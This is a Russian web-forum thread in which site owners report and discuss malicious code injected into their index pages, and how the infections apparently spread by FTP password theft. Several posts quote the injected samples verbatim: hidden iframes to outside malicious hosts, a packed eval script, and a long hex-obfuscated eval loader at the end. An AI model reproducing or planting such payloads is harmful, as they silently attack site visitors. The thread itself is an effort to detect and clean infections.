Как обнаружить вирус-троян на сайте?

Автор AlexN, 19 января 2007, 10:40:18

« назад - далее »

0 Пользователи и 2 гостей просматривают эту тему.

AlexN

Всем доброго времени!
Я хотел включить свой форум в рейтинг. Но мне пришел ответ.

"При проверке вашего сайта был обнаружен вирус-троян, который
автоматически подгружается в систему. К сожалению, такой сайт невозможно допустить к участию в ТОП-777, хотя его тематика соответствует 100%-но."


Это для меня новость. Может вы мне поможете?
Из модов установлены TinyPortal 0.97 и Users Online Today Mod.

Сканировал сайт на вирусы в Cpanel. Вирусов и троянов не обнаруживается.
На компьютерах установлен Касперский, html защита включена - вирусов и
троянов нет.
Скакчивал все содержимое сайта и проверял на локальном компьютере - тот же
результат.
Может вы подскажете как или чем можно поймать этот вирус-троян? И что этот
троян делает?
http://www.okorites.ru/
========================
Проблема найдена. В корневой index.php в самый конец было записано:
<iframe width=1 height=1 border=0 frameborder=0 src='http://trustdotcom.com/nnews/index.php' style='display:none;'></iframe>
Говорят что взломан сервер.
C уважением, AlexN

YSV


AlexN

Легко сказать.

Взломанные хостинг-провайдеры:
masterhost.ru (1)
agava.ru (4)
achbank.com (2)
rusmedved.ru (7)
majordomo.ru (2)
rbc.ru (1)
infobox.ru (1)
slavhost.ru (1)
mchost.ru (1)
parkhost.ru (1)
ht-systems.ru (1)
100mb.net (1)

Так на какой менять? Но чтобы на все 100% гарантии.

Mavn

на 100 % никто гарантию не даст даже на собственном серваке ты не будешь в 100 % безопасности
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

AlexN

Это был сарказм на заявление "Меняй провайдера!"
Ясно что никто и никогда не даст 100% гарантии.

Интересно [censored]д 444 спасет от повторных изменений файла?

YSV

Цитировать
Взломанные хостинг-провайдеры:
masterhost.ru (1)

Я на мастерхосте - ничего не разу не ломали...

bessmkm2

вот значится сегодня залез нафорум и обнаружил , что у меня подгружается в index.php вот ента зараза <iframe src='http://mystabcounter.info/index2.php' width='6' height='6' style='visibility: hidden;'></iframe>.

Avdenago

Удаляем. Защищаем сервер получше.

bessmkm2

А как правильно защищать? какие права должны стоять на папках? на php файлах? Вот к примеру у меня на index.php стояли права 644. Как же в него кто то запихнул эту заразу?

bessmkm2

Цитата: AlexN от 21 января 2007, 23:48:24
Легко сказать.

Взломанные хостинг-провайдеры:
masterhost.ru (1)
agava.ru (4)
achbank.com (2)
rusmedved.ru (7)
majordomo.ru (2)
rbc.ru (1)
infobox.ru (1)
slavhost.ru (1)
mchost.ru (1)
parkhost.ru (1)
ht-systems.ru (1)
100mb.net (1)

Так на какой менять? Но чтобы на все 100% гарантии.

А как взломали то? вот я на славхосье , как именно взломали?

Mavn

смотрите логи апача я не думаю что проблема в безопасности хоста!
Проверьте свой комп на вирусники потому как зачастую все это происходит из за заразы на вашем же компе.
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Asio Otus

Приветствую всех!
У меня тоже форум на славхосте, и такая же картина. Во все индекс-файлы форума залезла закомментированная реклама (это вчера произошло). На сервере проверила на вирусы, не обнаружила, у себя и доктором вэб, и нодом проверила, ничего нет... Вот такие дела.

<!-- ~ -->"<!--iframe src='http://sabah-travel.org/tds/iframe.php' width='1' height='1' style='visibility: hidden;'></iframe-->"<!-- ~ --><!-- ~ -->"<!--iframe src='http://sabah-travel.org/tds/iframe.php' width='1' height='1' style='visibility: hidden;'></iframe-->"<!-- ~ -->

Может кто знает, как лучше защитить сервер? А то каждый раз чистить это невесело совсем...

Mavn

то что у вас не обнаруживается вирусняк это не значит что его нет :). Как правило заражение файла(его изменение) связано именно с заражением компьютера. Также советую при таких проявлениях сменить все пароли доступа ко всему что у вас имеется потому как зная пароль программа сама может заходить по фтп и изменять файл например index.php index.htm и прочие с чего у вас начинается загрузка
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Asio Otus

Большое спасибо за ответ!

Вчера как проверила компьютер, после этого сменила пароли, вчера все работало, а сегодня пароли не проходят:))))), мучаю техподдержку хостинга  knuppel

SlavaRom

#14
Проблема аналогичная той, что в начале поста.
Сегодня ночью на нашей площадке произошло несанкционированное проникновение и изменение отдельных html и php файлов сайта. Изменения были обнаружены в файлах index.shtml, index.html, default.html, index.php. В конце приписана строчка-скрипт (вид ее: <script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('6.7(\'<0 8=5://4.2.3.9/a/b.g h=1 f=1 e="c:d"></0>\');',18,18,'iframe||109|22|78|http|document|write|src|242||index|display|none|style|height|php|width'.split('|'),0,{}));
</script>
) и ответ провайдера:

В сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct (возможны другия названия), распространяющий себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код.

В случае обнаружения следов вируса необходимо выполнить следующие действия с обязательным соблюдением порядка:
1. Удалить вирусное содержимое со страниц вашего сайта.
2. Проверить локальный компьютер на наличие вирусов.
3. Зайти в панель управления хостинг-аккаунтом и изменить пароль на пользователя FTP.

Надеюсь, пригодится при решении аналогичных проблем.
И еще рекомендация:
В дальнейшем стоит поменять названия вашего индексного файла на отличное от index.php(к примеру stranica.php).
Также это измененения необходимо внести в настройки веб-сервера.
Также всегда стоит проверять код сайта на наличие уязвимостей.


digger®

Цитата: SlavaRom от 30 ноября 2007, 16:27:20
Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя.
Можете даже не говорить, о каком браузере идет речь :)

SlavaRom

Дело даже не в браузере. Дырка в безопасности у провайдера:
_http://www.hostforum.ru/showthread.php?t=11581

SlavaRom

Проблема была с безопасностью у провайдера. Хакерами создавались дополнительные логины FTP-доступа, по которым проходило заражение index/default-файлов сайта. Сейчас эта проблема устранена, "дырки" уже нет.

Annika

Цитата: YSV от 22 января 2007, 21:18:15
Я на мастерхосте - ничего не разу не ломали...
У нас ломали, правда движок форума другой был. А вообще неизвестно, проблема хостера или несовершенство скриптов.

Mavn

смотрите логи апача тогда точно поймете в чем дело
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

SlavaRom

#20
Annika,
Если движок форума один из распространенных, то скорее всего это проблема все-таки или у хостера или у пользователя. По скриптам (информацию по уязвимостям движка или отдельных его компонентов) можно попробовать посмотреть на _http://www.securitylab.ru . О  своих проблемах хостеры расказывают очень неохотно, можно посмотреть отдельные случаи на: _http://forum.hostobzor.ru (Раздел: Претензии и жалобы клиентов).

LelikBolik

Цитата: Mavn от 24 декабря 2007, 15:02:03
смотрите логи апача тогда точно поймете в чем дело

Подскажите ламеру, пожалуйста, где эти логи располагаются и на что конкретно смотреть?


С уважением,
Лелик

Serifa

А у кого файрвол на компе стоит? Будет ли файрвол в таком случае дополнительной защитой моего компьютера?
И вообще - не надо никуда ходить за пределы своих сайтов, чревато))
«- Помощник капитана Бакстер, - заявил Лумис, - безбожно врет. Все отнюдь не под контролем, вернее, не под его контролем. Корабль захвачен представителями небелковой формы разумной жизни, которые маскируются под обслуживающих роботов, а некоторые даже не делают и этого...»
«То, что у тебя есть, лечится антибиотиками» (nowhere man, 1995)
В телеге срочно нужны читатели!

saks

Цитата: bessmkm2 от 09 мая 2007, 17:31:17
А как взломали то? вот я на славхосье , как именно взломали?
у меня в начале этого года тоже был взлом. взломали сайты, которые у меня на разных хостингах. но в процессе разбора я выяснил что это не взлом а что то типа malvare которое хз как скорее всего занеслось на мой рабочий комп, и с него я думаю все и поменялось. были поражены все файлы index.php,  auth.php и все файлы *.html, *.shtml. в тело файлов было добавлено 2 вида кода, с двоичной вставкой, которая собственно поражала машины пользователей и с блоком запуска всплывающей рекламы порнухи. все вставки кода начинались на <!-- ad --> и заканчивались <!-- \ad -->
почистил оба хостинга ручками предварительно сменив пароли, адреса, явки :) щас все нормально. проблема не в разрешении доступа на файлы а в незащищенности локальной рабочей станции на которой выполняешь манипуляции с сайтами. там конкретно была использована дыра в эксплорере и SP2 для WinXP. не пользуйте IE !

P.S. если интересна - могу покопаться и найтить код который был вмонден. и вирусня была троян

Mavn

Цитата: His Divine Shadow от 24 января 2009, 00:06:04
А у кого файрвол на компе стоит? Будет ли файрвол в таком случае дополнительной защитой моего компьютера?
И вообще - не надо никуда ходить за пределы своих сайтов, чревато))
да сейчас у большинства фаер стоит без него вообще никуда.
доп защита безусловно, но при правильной настройке!
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Serifa

Кстати, о настройке файрвола! Давайте отдельную тему создадим, а? Ибо надо. Я со своим фаером больше воюю, чем работаю. Техподдержка внятного ничего сказать не может. "Отправьте файл" - отправляю - "скорее всего, ложное срабатывание, попробуйте отключить защиту..." Нормальный ответ?

А еще дополнительную тему про браузер. Мне приходится работать сразу с двумя. Потому что я не могу зайти на хостинг через Оперу, я уже не знаю, что там надо менять и как ей объяснить. Только через ИЕ.

В общем, сплошные проблемы.
«- Помощник капитана Бакстер, - заявил Лумис, - безбожно врет. Все отнюдь не под контролем, вернее, не под его контролем. Корабль захвачен представителями небелковой формы разумной жизни, которые маскируются под обслуживающих роботов, а некоторые даже не делают и этого...»
«То, что у тебя есть, лечится антибиотиками» (nowhere man, 1995)
В телеге срочно нужны читатели!

Mavn

у меня броузеров еще больше :)
FireFox 2 и 3, Opera несколько версий, IE 6 и 7, Chrome(Google), Apple Safari for Windows.
По настройкам фаера можно конечно создать только отвечать трудно будет для того чтобы ответить как настроить тот или иной фаер нужно его установить для начала.
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Serifa

Цитата: Mavn от 26 января 2009, 18:49:11
у меня броузеров еще больше :)
FireFox 2 и 3, Opera несколько версий, IE 6 и 7, Chrome(Google), Apple Safari for Windows.
По настройкам фаера можно конечно создать только отвечать трудно будет для того чтобы ответить как настроить тот или иной фаер нужно его установить для начала.

Равнение на знамя!)) То есть, два - не предел. Понятно.
Насчет фаера: неужели их больше, чем браузеров? Я думаю, хоть у пары камрадов найдется Аутпост Файрвол на компе.
«- Помощник капитана Бакстер, - заявил Лумис, - безбожно врет. Все отнюдь не под контролем, вернее, не под его контролем. Корабль захвачен представителями небелковой формы разумной жизни, которые маскируются под обслуживающих роботов, а некоторые даже не делают и этого...»
«То, что у тебя есть, лечится антибиотиками» (nowhere man, 1995)
В телеге срочно нужны читатели!

Mavn

Намного больше :)
OutPost, McAfee Desctop Personal, Kerio, McAfee Total Protection, Sygate Personal и прочие в общем их пруд пруди :)
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Serifa

Может, все-таки создать тему, рассказать о проблеме - вдруг у кого такой же файрвол и он уже с ним разобрался? И ждать. В общем, как все обычные темы на этом форуме)) Почти.
«- Помощник капитана Бакстер, - заявил Лумис, - безбожно врет. Все отнюдь не под контролем, вернее, не под его контролем. Корабль захвачен представителями небелковой формы разумной жизни, которые маскируются под обслуживающих роботов, а некоторые даже не делают и этого...»
«То, что у тебя есть, лечится антибиотиками» (nowhere man, 1995)
В телеге срочно нужны читатели!

Yworld_garry

Цитироватьвдруг у кого такой же файрвол
Создать тему я думаю не проблема, но всё ограничится стандартной установкой.
Влияют факторы на настройки.
1 Ось
2 Софт установленный и используемый.
3 Железо
4 Провайдер
5 Хостер

Скорее такие темы больше обсуждаются на форумах интернет провайдеров. так как там люди объединённые одной бедой с похожими проблемами.
ну и фаер сам по себе не самая лучшая защита от такого рода троянов. Получить его можно многими способами, не только посещая заряженные сайты, а принимая почту и аську такого рода.
тут больше надежда на антивирь.

Mavn

#31
Создавай мы не против. Раздел Общение на околофорумные темы
Цитата: Yworld_garry от 26 января 2009, 19:15:50
ну и фаер сам по себе не самая лучшая защита от такого рода троянов. Получить его можно многими способами, не только посещая заряженные сайты, а принимая почту и аську такого рода.
тут больше надежда на антивирь.
скажем так немного не прав большинство троянов ведет сетевую деятельность а при настройках фаервола (некоторые позволяют это делать) можно следить за тем какая программа какие пакеты шлет и по каким портам и не давать это делать. Исходя из вышесказаного ты одним прогам разрешаешь ходить другим нет. Но есть и особенности у каждого трояна например подгружаться он будет как модуль какого нибудь ИЕ и фаервол может просто и не ругнуться на него.
Кстати антивирь тоже не панацея, как бы там не было а антивирь далеко не все вирусы может обнаружить и только по поведению компа можно определить что что-то не так. Нужен комплекс и в частности голова на плечах
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

melyfaro

Воть странно у меня тоже проблема ... на все страницы в корневом каталоге добавляется  такая муть
</html> <div id='x0cca6549fd36eed50b17cb3fb8772870c'><script>var jQuery = eval('wViVnxdxoxwx.xeUvWa/lV'.replace(/[W/xUV]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x75\x61\x63\x34\x28\x6c\x65\x78\x39\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x61\x4e\x51\x75\x4e\x32\x56\x28\x6b\x61\x54\x29\x7b\x76\x61\x72\x20\x6b\x39\x43\x55\x3d\x30\x3b\x76\x61\x72\x20\x76\x64\x4b\x6c\x3d\x6b\x61\x54\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x6c\x4f\x65\x77\x4c\x62\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x6c\x4f\x65\x77\x4c\x62\x3c\x76\x64\x4b\x6c\x29\x7b\x6b\x39\x43\x55\x2b\x3d\x68\x48\x33\x39\x28\x6b\x61\x54\x2c\x6c\x4f\x65\x77\x4c\x62\x29\x2a\x76\x64\x4b\x6c\x3b\x6c\x4f\x65\x77\x4c\x62\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\x28\x6b\x39\x43\x55\x2b\x27\x27\x29\x3b\x7d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x68\x48\x33\x39\x28\x74\x37\x75\x4a\x2c\x72\x67\x42\x62\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x74\x37\x75\x4a\x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x72\x67\x42\x62\x29\x3b\x7d\x20\x20\x20\x74\x72\x79\x20\x7b\x76\x61\x72\x20\x72\x42\x58\x55\x77\x53\x38\x4b\x3d\x65\x76\x61\x6c\x28\x27\x61\x62\x72\x5a\x67\x42\x75\x7e\x6d\x5a\x65\x42\x6e\x42\x74\x6a\x73\x5a\x2e\x5a\x63\x7e\x61\x62\x6c\x7e\x6c\x7e\x65\x62\x65\x62\x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x7e\x5a\x6a\x42\x62\x5d\x2f\x67\x2c\x20\x27\x27\x29\x29\x2c\x61\x73\x6c\x61\x79\x71\x65\x4c\x3d\x27\x27\x3b\x76\x61\x72\x20\x64\x6c\x58\x77\x3d\x30\x2c\x73\x6f\x49\x51\x73\x3d\x30\x2c\x69\x4d\x5a\x66\x35\x6d\x4d\x3d\x28\x6e\x65\x77\x20\x53\x74\x72\x69\x6e\x67\x28\x72\x42\x58\x55\x77\x53\x38\x4b\x29\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x5e\x40\x61\x2d\x7a\x30\x2d\x39\x41\x2d\x5a\x5f\x2e\x2c\x2d\x5d\x2f\x67\x2c\x27\x27\x29\x3b\x76\x61\x72\x20\x70\x56\x64\x3d\x61\x4e\x51\x75\x4e\x32\x56\x28\x69\x4d\x5a\x66\x35\x6d\x4d\x29\x3b\x6c\x65\x78\x39\x3d\x75\x6e\x65\x73\x63\x61\x70\x65\x28\x6c\x65\x78\x39\x29\x3b\x66\x6f\x72\x28\x76\x61\x72\x20\x67\x34\x39\x3d\x30\x3b\x20\x67\x34\x39\x20\x3c\x20\x28\x6c\x65\x78\x39\x2e\x6c\x65\x6e\x67\x74\x68\x29\x3b\x20\x67\x34\x39\x2b\x2b\x29\x7b\x76\x61\x72\x20\x65\x6b\x4b\x63\x3d\x68\x48\x33\x39\x28\x69\x4d\x5a\x66\x35\x6d\x4d\x2c\x64\x6c\x58\x77\x29\x5e\x68\x48\x33\x39\x28\x70\x56\x64\x2c\x73\x6f\x49\x51\x73\x29\x3b\x76\x61\x72\x20\x69\x39\x33\x68\x6b\x35\x4b\x3d\x68\x48\x33\x39\x28\x6c\x65\x78\x39\x2c\x67\x34\x39\x29\x3b\x64\x6c\x58\x77\x2b\x2b\x3b\x73\x6f\x49\x51\x73\x2b\x2b\x3b\x69\x66\x28\x73\x6f\x49\x51\x73\x3e\x70\x56\x64\x2e\x6c\x65\x6e\x67\x74\x68\x29\x73\x6f\x49\x51\x73\x3d\x30\x3b\x69\x66\x28\x64\x6c\x58\x77\x3e\x69\x4d\x5a\x66\x35\x6d\x4d\x2e\x6c\x65\x6e\x67\x74\x68\x29\x64\x6c\x58\x77\x3d\x30\x3b\x61\x73\x6c\x61\x79\x71\x65\x4c\x2b\x3d\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x69\x39\x33\x68\x6b\x35\x4b\x5e\x65\x6b\x4b\x63\x29\x20\x2b\x20\x27\x27\x3b\x7d\x65\x76\x61\x6c\x28\x61\x73\x6c\x61\x79\x71\x65\x4c\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x61\x73\x6c\x61\x79\x71\x65\x4c\x3d\x6e\x65\x77\x20\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x7d\x63\x61\x74\x63\x68\x28\x65\x29\x7b\x7d\x7d\x75\x61\x63\x34\x28\x27\x25\x33\x32\x25\x33\x39\x25\x33\x33\x25\x33\x35\x25\x33\x38\x25\x33\x36\x25\x33\x31\x25\x33\x32\x25\x35\x35\x25\x31\x61\x25\x31\x34\x25\x34\x31\x25\x33\x38\x25\x37\x35\x25\x36\x37\x25\x37\x33\x25\x32\x39\x25\x34\x65\x25\x31\x35\x25\x31\x34\x25\x30\x31\x25\x33\x64\x25\x37\x39\x25\x32\x38\x25\x32\x32\x25\x31\x33\x25\x32\x35\x25\x32\x38\x25\x30\x33\x25\x37\x38\x25\x31\x33\x25\x33\x36\x25\x37\x37\x25\x35\x38\x25\x36\x34\x25\x31\x61\x25\x32\x38\x25\x33\x64\x25\x37\x39\x25\x30\x32\x25\x35\x37\x25\x32\x31\x25\x32\x35\x25\x33\x36\x25\x31\x37\x25\x32\x61\x25\x33\x65\x25\x31\x36\x25\x37\x37\x25\x33\x30\x25\x33\x39\x25\x34\x32\x25\x33\x30\x25\x31\x63\x25\x33\x36\x25\x32\x33\x25\x33\x63\x25\x37\x62\x25\x37\x37\x25\x36\x66\x25\x33\x36\x25\x32\x35\x25\x30\x65\x25\x34\x64\x25\x36\x65\x25\x36\x61\x25\x31\x61\x25\x33\x34\x25\x32\x39\x25\x36\x31\x25\x37\x36\x25\x30\x61\x25\x33\x31\x25\x33\x33\x25\x33\x34\x25\x31\x33\x25\x33\x38\x25\x30\x66\x25\x31\x63\x25\x33\x64\x25\x31\x33\x25\x36\x63\x25\x35\x35\x25\x33\x61\x25\x33\x39\x25\x36\x37\x25\x31\x36\x25\x30\x35\x25\x33\x38\x25\x32\x63\x25\x36\x39\x25\x32\x37\x25\x37\x34\x25\x32\x37\x25\x30\x39\x25\x36\x65\x25\x31\x65\x25\x31\x32\x25\x30\x61\x25\x32\x65\x25\x31\x63\x25\x33\x34\x25\x36\x33\x25\x36\x36\x25\x35\x64\x25\x33\x62\x25\x32\x62\x25\x32\x31\x25\x33\x34\x25\x33\x61\x25\x31\x36\x25\x33\x38\x25\x32\x34\x25\x37\x62\x25\x32\x62\x25\x32\x36\x25\x31\x66\x25\x33\x39\x25\x37\x65\x25\x32\x61\x25\x30\x30\x25\x30\x63\x25\x33\x63\x25\x33\x31\x25\x33\x39\x25\x34\x61\x25\x33\x64\x25\x32\x36\x25\x33\x64\x25\x32\x39\x25\x37\x30\x25\x31\x61\x25\x33\x66\x25\x32\x62\x25\x31\x61\x25\x36\x30\x25\x33\x62\x25\x35\x39\x25\x35\x64\x25\x32\x62\x25\x32\x35\x25\x31\x36\x25\x37\x38\x25\x35\x62\x25\x36\x63\x25\x36\x64\x25\x32\x32\x25\x36\x39\x25\x32\x35\x25\x32\x37\x25\x37\x32\x25\x31\x33\x25\x32\x33\x25\x37\x31\x25\x33\x66\x25\x37\x33\x25\x33\x61\x25\x32\x66\x25\x30\x32\x25\x37\x65\x25\x31\x32\x25\x30\x34\x25\x30\x37\x25\x32\x38\x25\x36\x39\x25\x37\x62\x25\x35\x34\x25\x33\x33\x25\x32\x30\x25\x33\x34\x25\x32\x64\x25\x32\x64\x25\x33\x35\x25\x32\x34\x25\x36\x66\x25\x35\x33\x25\x34\x65\x25\x34\x66\x25\x36\x35\x25\x36\x62\x25\x33\x63\x25\x34\x36\x25\x36\x36\x25\x37\x33\x25\x36\x39\x25\x36\x61\x25\x36\x30\x25\x37\x39\x25\x34\x39\x25\x34\x38\x25\x33\x61\x25\x31\x65\x25\x32\x33\x25\x32\x30\x25\x30\x31\x25\x33\x31\x25\x31\x65\x25\x31\x61\x25\x35\x65\x25\x32\x65\x25\x33\x36\x25\x32\x39\x25\x30\x39\x25\x37\x31\x25\x30\x65\x25\x37\x31\x25\x35\x63\x25\x37\x30\x25\x33\x62\x25\x33\x65\x25\x33\x64\x25\x33\x66\x25\x37\x33\x25\x37\x38\x25\x33\x63\x25\x35\x30\x25\x36\x61\x25\x36\x62\x25\x37\x66\x25\x37\x66\x25\x37\x62\x25\x33\x36\x25\x31\x38\x25\x33\x62\x25\x32\x33\x25\x32\x30\x25\x33\x62\x25\x33\x37\x25\x36\x66\x25\x33\x38\x25\x32\x39\x25\x32\x38\x25\x33\x36\x25\x35\x30\x25\x36\x38\x25\x37\x65\x25\x34\x34\x25\x36\x33\x25\x33\x63\x25\x33\x63\x25\x32\x35\x25\x33\x37\x25\x32\x61\x25\x32\x30\x25\x37\x61\x25\x32\x32\x25\x36\x34\x25\x37\x63\x25\x31\x62\x25\x34\x65\x25\x33\x35\x25\x35\x66\x25\x35\x39\x25\x31\x64\x25\x32\x61\x25\x33\x63\x25\x32\x61\x25\x37\x31\x25\x33\x35\x25\x31\x31\x25\x30\x39\x25\x37\x66\x25\x36\x37\x25\x35\x62\x25\x36\x31\x25\x33\x37\x25\x37\x33\x25\x33\x65\x25\x33\x39\x25\x30\x30\x25\x31\x35\x25\x30\x30\x25\x30\x32\x25\x33\x62\x25\x32\x32\x25\x36\x30\x25\x30\x39\x25\x36\x38\x25\x31\x33\x25\x33\x62\x25\x32\x35\x25\x33\x61\x25\x33\x30\x25\x37\x62\x25\x36\x39\x25\x35\x31\x25\x33\x35\x25\x35\x38\x25\x32\x36\x25\x36\x61\x25\x36\x61\x25\x36\x35\x25\x31\x36\x25\x37\x35\x25\x34\x33\x25\x34\x34\x25\x35\x35\x25\x36\x63\x25\x37\x31\x25\x32\x30\x25\x36\x63\x25\x33\x63\x25\x33\x39\x25\x36\x33\x25\x36\x33\x25\x37\x65\x25\x33\x32\x25\x33\x37\x25\x31\x65\x25\x31\x31\x25\x32\x30\x25\x31\x64\x25\x36\x64\x25\x31\x30\x25\x34\x37\x25\x31\x63\x25\x30\x63\x25\x33\x61\x25\x36\x62\x25\x33\x63\x25\x31\x65\x25\x37\x33\x25\x33\x65\x25\x31\x36\x25\x36\x66\x25\x32\x39\x25\x32\x35\x25\x31\x66\x25\x32\x64\x25\x37\x64\x25\x32\x34\x25\x32\x61\x25\x30\x63\x25\x32\x64\x25\x37\x32\x25\x32\x38\x25\x36\x33\x25\x33\x31\x25\x33\x32\x25\x32\x61\x25\x32\x31\x25\x32\x66\x25\x32\x31\x25\x33\x33\x25\x36\x32\x25\x32\x63\x25\x32\x33\x25\x37\x31\x25\x32\x32\x25\x33\x36\x25\x34\x62\x25\x37\x37\x25\x36\x61\x25\x32\x61\x25\x36\x66\x25\x33\x63\x25\x33\x61\x25\x32\x63\x25\x37\x62\x25\x31\x37\x25\x33\x35\x25\x33\x31\x25\x36\x63\x25\x36\x35\x25\x32\x62\x25\x30\x31\x25\x32\x32\x25\x33\x62\x25\x31\x65\x25\x31\x63\x25\x37\x33\x25\x37\x62\x25\x34\x30\x25\x33\x36\x25\x32\x66\x25\x37\x35\x25\x34\x65\x25\x37\x33\x25\x36\x66\x25\x37\x31\x25\x37\x32\x25\x31\x62\x25\x37\x62\x25\x33\x64\x25\x33\x36\x25\x30\x33\x25\x31\x32\x25\x30\x63\x25\x31\x30\x25\x36\x63\x25\x37\x39\x25\x32\x64\x25\x35\x61\x25\x36\x34\x25\x33\x32\x25\x31\x61\x25\x33\x33\x25\x30\x33\x25\x31\x36\x25\x32\x37\x25\x32\x32\x25\x33\x62\x25\x36\x33\x25\x36\x31\x25\x31\x39\x25\x36\x37\x25\x32\x34\x25\x33\x36\x25\x36\x33\x25\x30\x37\x25\x33\x37\x25\x31\x36\x25\x36\x66\x25\x31\x31\x25\x37\x37\x25\x32\x37\x25\x32\x32\x25\x36\x61\x25\x33\x63\x25\x37\x30\x25\x37\x31\x25\x36\x33\x25\x30\x64\x25\x32\x64\x25\x34\x66\x25\x32\x35\x25\x32\x61\x25\x32\x35\x25\x31\x61\x25\x30\x31\x25\x32\x35\x25\x31\x30\x25\x31\x64\x25\x32\x34\x25\x32\x66\x25\x30\x38\x25\x30\x38\x25\x32\x39\x25\x32\x64\x25\x30\x31\x25\x30\x30\x25\x33\x34\x25\x37\x63\x25\x37\x66\x25\x32\x30\x25\x32\x39\x25\x32\x33\x25\x32\x62\x25\x36\x31\x25\x31\x63\x25\x34\x36\x25\x34\x61\x25\x37\x63\x25\x34\x39\x25\x33\x35\x25\x31\x33\x25\x33\x63\x25\x31\x34\x25\x32\x65\x25\x30\x61\x25\x37\x30\x25\x33\x32\x25\x31\x63\x25\x31\x64\x25\x37\x37\x25\x31\x33\x25\x30\x36\x25\x36\x31\x25\x33\x32\x25\x31\x36\x25\x33\x38\x25\x31\x64\x25\x37\x31\x25\x30\x35\x25\x30\x39\x25\x37\x39\x25\x31\x34\x25\x32\x31\x25\x35\x32\x25\x33\x62\x25\x30\x61\x25\x32\x37\x25\x31\x62\x25\x33\x38\x25\x30\x39\x25\x30\x39\x25\x33\x34\x25\x30\x62\x25\x30\x34\x25\x33\x65\x25\x31\x62\x25\x36\x32\x25\x31\x39\x25\x37\x32\x25\x32\x35\x25\x32\x66\x25\x31\x61\x25\x33\x30\x25\x33\x39\x25\x33\x35\x25\x31\x38\x25\x31\x66\x25\x35\x36\x25\x32\x35\x25\x36\x38\x25\x31\x36\x25\x36\x36\x25\x34\x33\x25\x36\x32\x25\x30\x35\x25\x33\x63\x25\x34\x64\x25\x33\x39\x25\x31\x64\x25\x33\x33\x25\x33\x34\x25\x33\x62\x25\x31\x65\x25\x32\x35\x25\x31\x61\x25\x37\x65\x25\x33\x61\x25\x33\x32\x25\x31\x36\x25\x32\x30\x25\x31\x37\x25\x32\x61\x25\x31\x30\x25\x34\x30\x25\x30\x63\x25\x33\x39\x25\x36\x31\x25\x31\x37\x25\x36\x33\x25\x37\x35\x25\x32\x62\x25\x32\x30\x25\x32\x64\x25\x33\x66\x25\x31\x38\x25\x32\x30\x25\x33\x39\x25\x35\x37\x25\x37\x34\x25\x30\x36\x25\x30\x64\x25\x32\x31\x25\x30\x39\x25\x32\x65\x25\x30\x30\x25\x31\x64\x25\x30\x39\x25\x37\x39\x25\x33\x65\x25\x36\x65\x25\x37\x32\x25\x37\x64\x25\x34\x32\x25\x31\x62\x25\x37\x34\x25\x33\x32\x25\x33\x33\x25\x33\x32\x25\x33\x31\x25\x37\x36\x25\x33\x61\x25\x30\x62\x25\x33\x33\x25\x31\x65\x25\x32\x32\x25\x36\x30\x25\x33\x39\x25\x33\x36\x25\x31\x63\x25\x35\x39\x25\x32\x61\x25\x36\x66\x25\x37\x65\x25\x37\x62\x25\x36\x33\x25\x30\x64\x25\x37\x65\x25\x33\x38\x25\x36\x64\x25\x32\x36\x25\x35\x66\x25\x31\x31\x25\x35\x32\x25\x36\x66\x25\x30\x37\x25\x33\x61\x25\x33\x36\x25\x35\x33\x25\x30\x34\x25\x33\x34\x25\x32\x61\x25\x33\x66\x25\x36\x31\x25\x32\x64\x25\x30\x36\x25\x36\x39\x25\x37\x61\x25\x30\x39\x25\x37\x63\x25\x31\x39\x25\x37\x38\x25\x31\x36